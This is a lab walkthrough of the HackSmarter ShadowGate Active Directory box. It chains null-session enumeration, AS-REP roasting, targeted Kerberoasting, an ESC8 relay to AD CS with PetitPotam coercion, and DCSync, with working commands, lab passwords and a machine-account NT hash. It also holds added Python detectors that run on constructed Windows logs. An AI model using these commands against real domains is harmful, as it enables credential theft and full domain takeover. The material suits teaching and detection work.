ShadowGate

Note: This is a free lab! Spin it up on the HackSmarter Platform and make sure to join the Discord Server—the best cybersecurity community to hang out and level up!

Summary

ShadowGate is a straightforward Active Directory lab from HackSmarter focused on internal misconfigurations. The attack path starts with a Null Session to dump usernames, leading directly to an AS-REP Roasting compromise. Post-exploitation with BloodHound reveals a GenericWrite permission over another domain account, allowing us to execute a Targeted Kerberoasting attack. Finally, running Certipy uncovers a weak ADCS setup ripe for an ESC8 exploit, letting us relay authentication to get full Domain Admin rights.

Scanning

We are dealing with a Domain Controller based on the services running on the target:

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 126 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 126 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-05-21 23:02:37Z)
135/tcp   open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: shadow.gate0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 126
464/tcp   open  kpasswd5?     syn-ack ttl 126
593/tcp   open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: shadow.gate0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: shadow.gate0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: shadow.gate0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 126 .NET Message Framing

Initial Creds

Make sure to add the target to your /etc/hosts first, then confirm you can reach it over SMB:

nxc smb 10.1.22.120

[Screenshot: Initial Enum]

We can enumerate valid users over a null session. There are several ways to do this; one of them is rpcclient:

rpcclient -U '' 10.1.22.120 -N -c 'enumdomusers'

[Screenshot: Domain Users]

Use the following one-liner to extract all the domain users and save them to a file:

rpcclient -U '' 10.1.22.120 -N -c 'enumdomusers' | grep -oP '\[.*?\]' | grep -v 0x | tr -d '[]' | tee users.txt

[Screenshot: Users File]

ASREProast Attack

With a list of domain users in hand, we can test for AS-REP roastable accounts. In this case we are able to grab a hash for jtrueblood:

GetNPUsers.py -no-pass -usersfile users.txt shadow.gate/ -output hashes

[Screenshot: ASREProast]

Cracking it with john:

john hashes --wordlist=/usr/share/wordlists/rockyou.txt

[Screenshot: First Creds]

We managed to get our initial domain credentials, which we can validate over SMB while listing the shares:

nxc smb 10.1.22.120 -u 'jtrueblood' -p 'blood_brothers' --shares

[Screenshot: Shares]
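The two steps above (the null-session user dump and the AS-REP roast of jtrueblood) are loud on the domain controller: every TGT request is recorded as Security event 4768, and a -usersfile sweep produces one 4768 per name in users.txt, almost all of them KDC_ERR_PREAUTH_REQUIRED failures from one client address, plus a success with PreAuthType 0 for the roastable account. The Python below is an added example, not part of the original write-up or of any tool it uses: it runs that detection logic over constructed 4768 records (10.200.59.29 is the attacker's listener address from this write-up; the other addresses and extra account names are made up) and decodes the userAccountControl flag that makes an account roastable, which is the bit a defender clears to fix it.

```python
"""AS-REP roasting as seen in the DC's Security log (event 4768, Kerberos TGT requested).
Added example, not part of the original write-up; all records below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# userAccountControl bit that disables Kerberos pre-authentication and makes an account roastable
DONT_REQ_PREAUTH = 0x400000


def constructed_4768_events():
    """Constructed sample records shaped like 4768 fields (not real logs). On failure audits
    Windows fills the encryption type with 0xffffffff, the pre-auth type with '-' and puts
    the Kerberos error code in Status."""
    sweep_ip = "::ffff:10.200.59.29"   # attacking host from the write-up
    base = datetime(2026, 5, 21, 23, 2, 40)
    events = [
        # The roastable account: TGT issued with no pre-auth, RC4 encrypted (what GetNPUsers.py asks for)
        {"TimeCreated": base, "TargetUserName": "jtrueblood", "ServiceName": "krbtgt",
         "TicketEncryptionType": "0x17", "PreAuthType": "0", "Status": "0x0", "IpAddress": sweep_ip},
    ]
    # The rest of users.txt: pre-auth is required, so the KDC answers KDC_ERR_PREAUTH_REQUIRED (0x19)
    for i, user in enumerate(["bbrown", "administrator", "guest", "svc_backup", "hr01", "it02"]):
        events.append({"TimeCreated": base + timedelta(seconds=i), "TargetUserName": user,
                       "ServiceName": "krbtgt", "TicketEncryptionType": "0xffffffff",
                       "PreAuthType": "-", "Status": "0x19", "IpAddress": sweep_ip})
    # A normal logon from a workstation: PA-ENC-TIMESTAMP pre-auth (type 2), AES256 ticket
    events.append({"TimeCreated": base + timedelta(minutes=3), "TargetUserName": "bbrown",
                   "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "PreAuthType": "2",
                   "Status": "0x0", "IpAddress": "::ffff:10.1.22.50"})
    return events


def roastable_tickets(events):
    """Every TGT the KDC issued without pre-authentication, as (user, client ip, etype).
    RC4 (0x17) is the classic case, but an AES AS-REP can be cracked offline too, so both count."""
    return [(e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"])
            for e in events
            if e["ServiceName"].lower() == "krbtgt" and e["PreAuthType"] == "0" and e["Status"] == "0x0"]


def enumeration_sweeps(events, window=timedelta(seconds=30), min_users=5):
    """Client IPs that requested TGTs for at least min_users distinct accounts inside one window,
    successes and 0x19 failures alike. A -usersfile run produces exactly this burst."""
    by_ip = defaultdict(list)
    for e in events:
        if e["ServiceName"].lower() == "krbtgt":
            by_ip[e["IpAddress"]].append(e)
    sweeps = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        for i, start in enumerate(evs):
            users = {e["TargetUserName"] for e in evs[i:]
                     if e["TimeCreated"] - start["TimeCreated"] <= window}
            if len(users) >= min_users:
                sweeps[ip] = users
                break
    return sweeps


def is_dont_req_preauth(user_account_control):
    """True when the account's userAccountControl has DONT_REQ_PREAUTH set; clearing it
    (and rotating the password) is the fix for an account that has already been roasted."""
    return bool(int(user_account_control) & DONT_REQ_PREAUTH)


if __name__ == "__main__":
    evs = constructed_4768_events()
    for user, ip, etype in roastable_tickets(evs):
        print(f"AS-REP without pre-auth: {user} from {ip} (etype {etype})")
    for ip, users in enumeration_sweeps(evs).items():
        print(f"TGT sweep from {ip}: {len(users)} distinct accounts in one window")
```

The sweep heuristic deliberately counts failures as well as successes: the one roastable account is a single event, but the surrounding wall of 0x19 errors from the same address is what makes the activity stand out from a user who simply mistyped a password.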

BloodHound Enum

We will use rusthound-ce to collect the data we need for BloodHound:

rusthound-ce -u 'jtrueblood' -p 'blood_brothers' -d shadow.gate -z

[Screenshot: RustHound, Happy Graphing]

Targeted Kerberoast

Once the data is ingested into BloodHound, we notice that the user we compromised earlier has GenericWrite over BBROWN.

[Screenshot: GenericWrite]

This privilege lets us perform Targeted Kerberoasting and recover bbrown's password after cracking the resulting hash:

# Making bbrown vulnerable to kerberoasting
❯ targetedKerberoast.py -v -d 'shadow.gate' -u 'jtrueblood' -p 'blood_brothers' -o bbrown.hash
# Cracking
❯ john bbrown.hash --wordlist=/usr/share/wordlists/rockyou.txt

[Screenshot: Bbrown Pwned]
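From the defender's side, a targeted Kerberoast is a three-event sequence: a 5136 (Directory Service Changes) as the SPN is written onto the victim's object, a 4769 service-ticket request naming that account, and a second 5136 as the SPN is deleted again. The Python below is an added example, not from the write-up or from targetedKerberoast.py: it correlates constructed records of that shape (account names from this box; the SPN values, timestamps and the svc_sql account are made up) and assumes the Directory Service Changes audit subcategory is enabled with an auditing SACL on the user objects, without which the 5136 events are never written.

```python
"""Targeted Kerberoasting as a Security-log sequence: SPN written (5136) -> service ticket
requested (4769) -> SPN removed (5136). Added example, not from the original write-up;
all records are constructed."""
from datetime import datetime, timedelta

SPN_ATTR = "servicePrincipalName"
VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"   # OperationType message ids in event 5136


def constructed_events():
    """Constructed sample 5136/4769 records (not real logs)."""
    t0 = datetime(2026, 5, 21, 23, 40, 0)
    bbrown = "CN=bbrown,CN=Users,DC=shadow,DC=gate"
    spn = "HOST/placeholder-spn"   # throwaway SPN; value is made up

    def change(ts, who, dn, value, op):
        return {"EventID": 5136, "TimeCreated": ts, "SubjectUserName": who, "ObjectDN": dn,
                "ObjectClass": "user", "AttributeLDAPDisplayName": SPN_ATTR,
                "AttributeValue": value, "OperationType": op}

    return [
        # GenericWrite abuse: a low-privilege user writes an SPN onto another user's object ...
        change(t0, "jtrueblood", bbrown, spn, VALUE_ADDED),
        # ... asks the KDC for an RC4 service ticket naming that account ...
        {"EventID": 4769, "TimeCreated": t0 + timedelta(seconds=2),
         "TargetUserName": "jtrueblood@SHADOW.GATE", "ServiceName": "bbrown",
         "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.200.59.29", "Status": "0x0"},
        # ... and deletes the SPN again.
        change(t0 + timedelta(seconds=4), "jtrueblood", bbrown, spn, VALUE_DELETED),
        # Benign: an admin registers a real SPN on a service account and leaves it in place.
        change(t0 + timedelta(hours=1), "Administrator", "CN=svc_sql,CN=Users,DC=shadow,DC=gate",
               "MSSQLSvc/db01.shadow.gate:1433", VALUE_ADDED),
    ]


def account_from_dn(dn):
    """First RDN value of the DN. Assumes CN equals sAMAccountName, which holds for default user objects."""
    return dn.split(",")[0].split("=", 1)[1]


def targeted_kerberoast_chains(events, window=timedelta(minutes=10)):
    """For every SPN added to a user object, look for a successful 4769 naming that account within
    `window` and whether the same SPN value was deleted again. Add -> request -> delete is the
    high-confidence pattern; the writer in the 5136 is the principal whose ACE needs reviewing."""
    def spn_change(e, op):
        return (e["EventID"] == 5136 and e["AttributeLDAPDisplayName"] == SPN_ATTR
                and e["ObjectClass"] == "user" and e["OperationType"] == op)

    chains = []
    for add in (e for e in events if spn_change(e, VALUE_ADDED)):
        target = account_from_dn(add["ObjectDN"])
        t_add, deadline = add["TimeCreated"], add["TimeCreated"] + window
        tgs = [e for e in events if e["EventID"] == 4769 and e["Status"] == "0x0"
               and e["ServiceName"].lower() == target.lower() and t_add <= e["TimeCreated"] <= deadline]
        if not tgs:
            continue
        removed = any(spn_change(e, VALUE_DELETED) and e["ObjectDN"] == add["ObjectDN"]
                      and e["AttributeValue"] == add["AttributeValue"]
                      and t_add <= e["TimeCreated"] <= deadline for e in events)
        chains.append({"writer": add["SubjectUserName"], "target": target, "spn": add["AttributeValue"],
                       "requesters": sorted({e["TargetUserName"] for e in tgs}),
                       "rc4": any(e["TicketEncryptionType"] == "0x17" for e in tgs),
                       "spn_removed": removed})
    return chains


if __name__ == "__main__":
    for c in targeted_kerberoast_chains(constructed_events()):
        print(f"{c['writer']} wrote SPN {c['spn']} on {c['target']}; TGS by {c['requesters']}, "
              f"rc4={c['rc4']}, spn removed again={c['spn_removed']}")
```

Even without the 4769 correlation, the first 5136 alone is worth an alert: a non-administrative account writing servicePrincipalName on somebody else's user object is the GenericWrite edge BloodHound drew, seen from the other side, and the remediation is to remove that ACE rather than to chase the ticket.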

ESC8 - NTLM Relay to AD CS Web Enrollment

This new user has no interesting permissions, but it is a member of the ADCS-READER group.

[Screenshot: ADCS-READER]

Our next step is to use Certipy to enumerate vulnerable templates and configuration on AD CS:

certipy find -u 'bbrown' -p '12345678' -dc-ip '10.1.22.120' -vulnerable -stdout

[Screenshot: Vulnerability Found]

Certipy reports ESC8: the AD CS HTTP-based web enrollment endpoint is enabled, which means authentication to it can be relayed.

[Screenshot: Web Enrollment page]

[Screenshot: Web Enrollment service]

You can enumerate the enabled templates with the following command:

certipy find -u 'bbrown' -p '12345678' -dc-ip '10.1.22.120' -enabled -stdout

[Screenshot: DomainController Template]

As shown in this post, we use Certipy to relay NTLM authentication to the AD CS web enrollment endpoint, and any coercion tool to force the domain controller to authenticate to our listener. Here we use nxc and its coerce_plus module:

# Setting up Relay Listener with Certipy
❯ certipy relay -target 'http://10.1.22.120' -template 'DomainController'
# Forced Authentication
❯ nxc smb 10.1.22.120 -M coerce_plus -o METHOD=Petitpotam -o LISTENER=10.200.59.29

[Screenshot: ESC8 Attack]

After that we receive a PFX file for the domain controller's machine account. Running Certipy once more turns it into the account's NT hash:

certipy auth -pfx dc01.pfx -dc-ip 10.1.22.120

[Screenshot: DC01$ NT Hash]
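Web enrollment is an IIS application, so the relayed request above is visible in the CA's IIS W3C log as an authenticated POST to /certsrv/certfnsh.asp by the DC's machine account, coming from the attacker's address rather than from the DC itself. The Python below is an added example, not from the write-up or from Certipy: it parses constructed log lines (the 10.1.22.120 and 10.200.59.29 addresses come from this box; the other lines, users and timings are made up) and flags machine accounts using the web pages, which computers never do in normal operation because they enroll through RPC/DCOM autoenrollment. The durable fix is to disable web enrollment where it is unused, or to require HTTPS with Extended Protection for Authentication so that a relayed NTLM exchange cannot complete.

```python
"""ESC8 from the CA's point of view: relayed enrollments show up in the IIS W3C log of the
web enrollment site. Added example, not from the original write-up; log lines are constructed."""

CONSTRUCTED_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2026-05-21 23:45:01 10.1.22.120 GET /certsrv/ - 80 SHADOW\\bbrown 10.1.22.50 Mozilla/5.0 - 200 0 0 15
2026-05-21 23:45:02 10.1.22.120 POST /certsrv/certfnsh.asp - 80 - 10.200.59.29 - - 401 2 5 3
2026-05-21 23:45:02 10.1.22.120 POST /certsrv/certfnsh.asp - 80 SHADOW\\DC01$ 10.200.59.29 - - 200 0 0 120
2026-05-21 23:46:10 10.1.22.120 GET /certsrv/certrqus.asp - 80 SHADOW\\Administrator 10.1.22.120 Mozilla/5.0 - 200 0 0 9
"""


def parse_w3c(text):
    """Turn an IIS W3C log into dicts keyed by the names in the #Fields directive."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            values = line.split()
            if len(values) == len(fields):
                records.append(dict(zip(fields, values)))
    return records


def suspicious_web_enrollments(records, known_host_ips):
    """Authenticated /certsrv/ requests made by a machine account (name ends in '$').
    A machine account on the web pages is odd on its own; when the client IP is not the
    host the account belongs to, it is the signature of a relayed coerced authentication.
    known_host_ips maps machine account -> its real IP and is supplied by the caller."""
    findings = []
    for r in records:
        user = r["cs-username"]
        if user == "-" or not r["cs-uri-stem"].lower().startswith("/certsrv/"):
            continue
        account = user.split("\\")[-1]          # strip the DOMAIN\ prefix
        if not account.endswith("$"):
            continue
        reason = "machine account using web enrollment"
        own_ip = known_host_ips.get(account.upper())
        if own_ip is not None and own_ip != r["c-ip"]:
            reason += f", from {r['c-ip']} rather than its own address {own_ip}"
        findings.append({"account": account, "client_ip": r["c-ip"], "uri": r["cs-uri-stem"],
                         "method": r["cs-method"], "status": r["sc-status"], "reason": reason})
    return findings


if __name__ == "__main__":
    recs = parse_w3c(CONSTRUCTED_IIS_LOG)
    # Assumed mapping for this box: DC01$ lives on the DC at 10.1.22.120
    for f in suspicious_web_enrollments(recs, {"DC01$": "10.1.22.120"}):
        print(f"{f['method']} {f['uri']} as {f['account']} from {f['client_ip']} -> {f['reason']}")
```

The 401 immediately followed by a 200 from the same client, the second one carrying a machine-account username, is the NTLM challenge-response of the relay landing on the CA; the Administrator and bbrown entries show what ordinary interactive use of the pages looks like by comparison.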

Authenticated as the domain controller's machine account, we can now dump any user's hash and gain full access to the server:

impacket-secretsdump 'dc01$@10.1.22.120' -hashes :57867e655d1abc9f45fd6e954e351531 -just-dc-user Administrator

[Screenshot: DCSync]
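Because this final step authenticates as the domain controller's own machine account, a DCSync rule that only asks "is the replicating principal a DC?" sees nothing wrong. Event 4662 with the DS-Replication-Get-Changes rights carries no source address, but its SubjectLogonId matches the TargetLogonId of the 4624 network logon that created the session, and that event does carry the client IP. The Python below is an added example, not from the write-up or from Impacket: it joins constructed 4662 and 4624 records on that logon id and flags replication requests from any address outside the known DC set (10.1.22.120 is the DC from this box; the second DC at 10.1.22.121, the logon ids and the unrelated 4662 are made up).

```python
"""DCSync as a Security-log join: 4662 (replication control-access rights on the domain object)
correlated with 4624 (network logon, carries the source IP) on the logon id.
Added example, not from the original write-up; all records are constructed."""
import re

DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL,
                      DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET}
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)


def constructed_events():
    """Constructed sample 4624/4662 records (not real logs). Logon ids are made up."""
    def logon(account, logon_id, ip):
        return {"EventID": 4624, "TargetUserName": account, "TargetDomainName": "SHADOW",
                "TargetLogonId": logon_id, "LogonType": "3", "IpAddress": ip}

    def replicate(account, logon_id):
        return {"EventID": 4662, "SubjectUserName": account, "SubjectLogonId": logon_id,
                "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",   # domainDNS class
                "AccessMask": "0x100",                                      # Control Access
                "Properties": "%%7688\n\t{" + DS_REPLICATION_GET_CHANGES + "}\n\t{"
                              + DS_REPLICATION_GET_CHANGES_ALL + "}\n\t{"
                              + DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET + "}"}

    return [
        # Legitimate replication partner (constructed second DC) coming from a DC address
        logon("DC02$", "0x1f4a8c", "10.1.22.121"), replicate("DC02$", "0x1f4a8c"),
        # The write-up's DCSync: DC01$'s NT hash used from the attacking host
        logon("DC01$", "0x3a4f21", "10.200.59.29"), replicate("DC01$", "0x3a4f21"),
        # Unrelated 4662 on some other object with a made-up property GUID: no replication rights
        {"EventID": 4662, "SubjectUserName": "bbrown", "SubjectLogonId": "0x5c0011",
         "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x20",
         "Properties": "%%7685\n\t{00000000-1111-2222-3333-444444444444}"},
    ]


def dcsync_from_unexpected_hosts(events, dc_ips):
    """4662 events that request replication rights and whose logon session (matched on the logon id)
    came from an address outside dc_ips. Returns one finding per such event."""
    session_ip = {e["TargetLogonId"]: e["IpAddress"] for e in events if e["EventID"] == 4624}
    findings = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        rights = {g.lower() for g in GUID_RE.findall(e["Properties"])} & REPLICATION_RIGHTS
        if not rights:
            continue
        ip = session_ip.get(e["SubjectLogonId"], "unknown")
        if ip not in dc_ips:
            findings.append({"account": e["SubjectUserName"], "source_ip": ip, "rights": sorted(rights)})
    return findings


if __name__ == "__main__":
    # Assumed DC address set for this box
    for f in dcsync_from_unexpected_hosts(constructed_events(), {"10.1.22.120", "10.1.22.121"}):
        print(f"replication by {f['account']} from {f['source_ip']} requesting {len(f['rights'])} rights")
```

A session whose logon id has no matching 4624 is reported with source "unknown" rather than dropped, since a missing logon event is itself worth a look. The DC02$ entry shows why the join matters: the same rights requested by the same kind of account are routine when the request comes from a DC address.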

Tasks

  • What is the KRBTGT NT Hash?
❯ impacket-secretsdump 'dc01$@10.1.22.120' -hashes :57867e655d1abc9f45fd6e954e351531 -just-dc-user krbtgt | grep krbtgt -m1 | cut -f4 -d:
b55**************************802

That’s a wrap for this box! Hack smarter, not harder! 🎯 🏁

This post is licensed under CC BY 4.0 by the author.